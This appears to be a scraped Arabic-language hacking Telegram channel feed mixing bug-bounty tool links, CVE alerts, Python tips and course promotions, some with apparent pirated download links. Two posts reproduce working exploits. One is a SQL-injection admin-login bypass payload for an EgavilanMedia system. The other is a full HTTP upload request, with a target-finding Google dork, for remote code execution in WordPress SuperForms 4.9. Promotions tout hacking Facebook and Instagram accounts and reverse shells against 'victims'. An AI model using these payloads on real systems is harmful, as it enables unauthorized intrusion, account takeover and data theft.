قناه متخصصه في: - أمن المعلومات - الهكر -الثغرات -الاخبار - وغيرها…
[-] TOP TOOLS BUG BOUNTY
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/mass dns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
TrickBot's BazarBackdoor malware is now coded in Nim to evade antivirus #nim #trickbot #bazar https://t.co/S8Qm3SKVrb
https://t.co/3xgChed7xk
Phpvuln - Audit Tool To Find Common Vulnerabilities In PHP Source Code
https://t.co/q5jw3HnGsY
https://t.co/kXmwW6PvjA
#CrossSiteScripting #LocalFileInclusion
yabridge: A modern and transparent way to use Windows VST2 plugins on Linux
https://github.com/robbert-vdh/yabridge
Police cars revolving light NEW: CVE-2021-26723 Police cars revolving light Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS. https://t.co/8sNJxF8l0y
https://t.co/xV8Y88r2lP
pipupgrade - Upgrade all your pip packages and automate your Python Dependency Management
https://t.co/Lp6Tw5Vu5S
Python tip:
Use secrets.token_urlsafe() to generate security tokens
For example, you can generate a token for a password reset👇 https://t.co/j7JidstxdF
CVE-2020-15097 loklak is an open-source server application which is able to collect messages from various sources, including twitter. The server contains a search index and a peer-to-peer index sharing interface. All messages are stored in an elasticsea... https://t.co/1pDfpFZP7T
https://twitter.com/HackrawiX
ShadowMove: Lateral Movement by Duplicating Existing Sockets
https://t.co/YvhFaKls7y https://t.co/TYSWKBWSz9
NEW: CVE-2020-20294 Police cars revolving light An issue was found in CMSWing project version 1.3.8. Because the log function does not check the log parameter, malicious parameters can execute arbitrary commands. Severity: CRITICAL https://t.co/borCWA6u6u
https://twitter.com/HackrawiX
[Udemy] Complete WebApplication Penetration Testing Practical C|WAPT [8.5 Hours]
Claim It Before Expired Coupon Code 👇
🔗Link:- https://bit.ly/3tnmVZ1 🔗
Coupon Code = SESSION10
Share With Credits
➖➖/channel/Yemen_Shield➖➖
🔰 [Udemy] Nmap for Ethical Hacking/ Network Security & Bug Bounties 🔰
🔗Link:- http://bit.ly/3qJ9Bw5 🔗
⭕️Size: 3.45 GB
🔺Share And Support Us🔻
➖➖ /channel/Yemen_Shield➖➖
[Udemy] Certified Ethical Hacker CEH v10
Claim It Before Expired Coupon Code 👇
🔗Link:- https://bit.ly/2My5mEQ 🔗
Coupon Code = ED18BAB33CF0FD1BAD63
Share With Credits
➖➖/channel/Yemen_Shield➖➖
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
# Date: 17-11-2020
# Exploit Author: Kislay Kumar
# Vendor Homepage: http://egavilanmedia.com
# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/
# Version: N/A (Default)
# Tested on: Kali Linux
SQL Injection:
SQL injection is a web security vulnerability that allows an attacker
to alter the SQL queries made to the database. This can be used to
retrieve some sensitive information, like database structure, tables,
columns, and their underlying data.
Attack Vector:
An attacker can gain admin panel access using malicious sql injection queri=
es.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/admin/login.html
2. Now put below Payload in both the fields( User ID & Password)
Payload: admin' or '1'='1
3. Server accepted our payload and we bypassed admin panel without any
credentials,
IMPACT:
if any attacker can gain admin panel access than they can Update &
Delete Userdata
Suggested Mitigation/Remediation Actions
Parameterized queries should be used to separate the command and data
portions of the intended query to the database. These queries prevent
an attacker from tampering with the query logic and extending a
concatenated database query string. Code reviews should be conducted
to identify any additional areas were the application or other
applications in the organization are vulnerable to this attack.
Additionally, input validation should be enforced on the server side
in order to ensure that only expected data is sent in queries. Where
possible security specific libraries should be used in order to
provide an additional layer of protection.
—- /channel/Yemen_Shield ——
#Ethical_hacking
The Complete Android Ethical Hacking Practical Course C|AEHP
100% Hands-On Real World Practical Approach on Android Ethical Hacking. Learn to Prevent FACEBOOK , INSTAGRAM hacking!
الكورس الأقوى في تعلم مجال Ethical Hacking بواسطة جهازك ال Android
كورس مدفوع شامل وضخم جدا لتعلم اختبار اختراق الشبكات والاجهزة وحسابات مثل Facebook و Instagram
ستتعلم في هذا الكورس على :
1-الاختراق بواسطة Metasploit
2-التنصت على الأجهزة المخترقة
3-تعلم على تطبيق Termux بالكامل والتعامل مع أوامر Linux
4-تثبيت نظام Kalilinux بدون Root
5-بناء Shell لفتح جلسات تنصت عكسية
6-اختراق المواقع بعدة ثغرات
7 اختراق الشبكات بعدة حمايات
8-استخدام وتعلم التشفير
9-تعلم الحماية من الهجمات المذكورة..
⚠️يرجى التسجيل قبل انتهاء مدة الكوبون غداً
📌رابط الكورس مدفوع على يوديمي مع الكوبون المجاني :
https://donia2link.com/AEHP
➖ @Dro_o ➖
➖@Yemen_shield➖
Patriot-Linux - Host IDS For Desktop Users
#HIDS #Linux #PatriotLinux #Python3 #RealTime #TCP/IP https://t.co/6djSojAegO
https://t.co/zQTEsG9HAb
افضل طريقه لفتح بورتات وختراق الاجهزه وعدم فقدان الضحيه "
"احد الشروحات الي نشرتها في اليوتيوب وتغلقت القناه "
inst: @hackrawi11
telegram: @HACKRAWI
twitter: @HackrawiX
Block device manager and system installation tool.
https://github.com/dankamongmen/growlight
Even faster bash startup
https://work.lisk.in/2020/11/20/even-faster-bash-startup.html
Python tip:
You can limit the execution time of some function by using signal library
An example :
https://t.co/dz8ruFxDoz
Python tip:
You can use runpy to run the module without importing it first
Works the same as -m command line option
An example👇 https://t.co/zKeqKBiTL0
CVE-2021-22307 There is a weak algorithm vulnerability in Mate 3010.0.0.203(C00E201R7P2). The protection is insufficient for the modules that should be protected. Local attackers can exploit this vulnerability to affect the integrity of certain module. https://t.co/KJswcEgHrl
https://twitter.com/HackrawiX
Police cars revolving light NEW: CVE-2020-35687 Police cars revolving light PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim. Severity: MEDIUM https://t.co/aNLwkr0qh6
https://twitter.com/HackrawiX
NEW: CVE-2021-21615 Police cars revolving light Jenkins 2.275 and LTS 2.263.2 allows reading arbitrary files using the file browser for workspaces and archived artifacts due to a time-of-check to time-of-use (TOCTOU) race condition. Severity: MEDIUM https://t.co/N2IO1r9t8W
https://twitter.com/HackrawiX
NEW: CVE-2021-3195 Police cars revolving light bitcoind in Bitcoin Core through 0.21.0 can create a new file in an arbitrary directory (e.g., outside the ~/.bitcoin directory) via a dumpwallet RPC call. Severity: HIGH https://t.co/HqPDA8boyF
https://twitter.com/HackrawiX
🔰 [Udemy] Bug Bounty Hunting: Website Hacking / Penetration Testing 🔰
♻️Size:- 1.42 GB
⭕️Source link:-
https://www.udemy.com/course/bug-bounty-hunting-guide/
⭕️Download link:-
https://bit.ly/36o2oK9
🔺Share And Support Us🔻
➖ /channel/Yemen_Shield ➖
# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)
# data in http request :
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
<=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"
0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)" <==== inject code extension (.php4)
for example
Content-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
# Uploaded Malicious File can be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .
➖➖/channel/Yemen_Shield➖➖
🔰 [Udemy] CompTIA CySA+ (CS0-002) Complete Course & Practice Exam 🔰
🔗Link:- http://bit.ly/3sKTJe3 🔗
⭕️Size: 14.79 GB
🔺Share And Support Us🔻
➖ /channel/Yemen_Shield ➖
[ Photo ]
🔰 Mobile Hacking Course By Mohammad Atef 🔰
➾ 49 VIDEO TUTORIALS
➾ FROM VERY BASIC TO ADVANCE
➾ SERIOUS PRACTICALS
➾ ALL ABOUT ADVANCED MOBILE HACKING
⭕️ LINK: https://bit.ly/3iLyd4l
—- /channel/Yemen_Shield ——
#Python
Build A Search Engine With Python: Computer Science & Python
AStateOfData.Com™ Computer Science With Python - Build A Search Engine With Python: Computer Science & Python
كورس مدفوع شامل في تعلم انشاء محرك بحث خاص بك كامل عن طريق لغة Python
🔴 ستتعلم في هذا الكورس على :
أن تكون قادرًا على البرمجة بلغة بايثون بشكل احترافي
تعلم البرمجة في Python 3
قم ببناء برنامج webcrawler الخاص بك باستخدام Python 3
أنشئ فهرس محرك بحث باستخدام Python 3
إتقان أساسيات علوم الحاسب الآلي لبناء أي برامج كمبيوتر.
كن قادرًا على استخدام Python لعلوم الكمبيوتر
كن قادرًا على بناء برامج بايثون الخاصة بك
إتقان لغة برمجة Python من خلال بناء محرك البحث الخاص بك
⚠️ يرجى التسجيل قبل انتهاء مدة الكوبون غداً
📌رابط الكورس مدفوع على يوديمي مع الكوبون المجاني :
https://donia2link.com/SearchEnginepy
➖ @Dro_o ➖
➖@Yemen_shield➖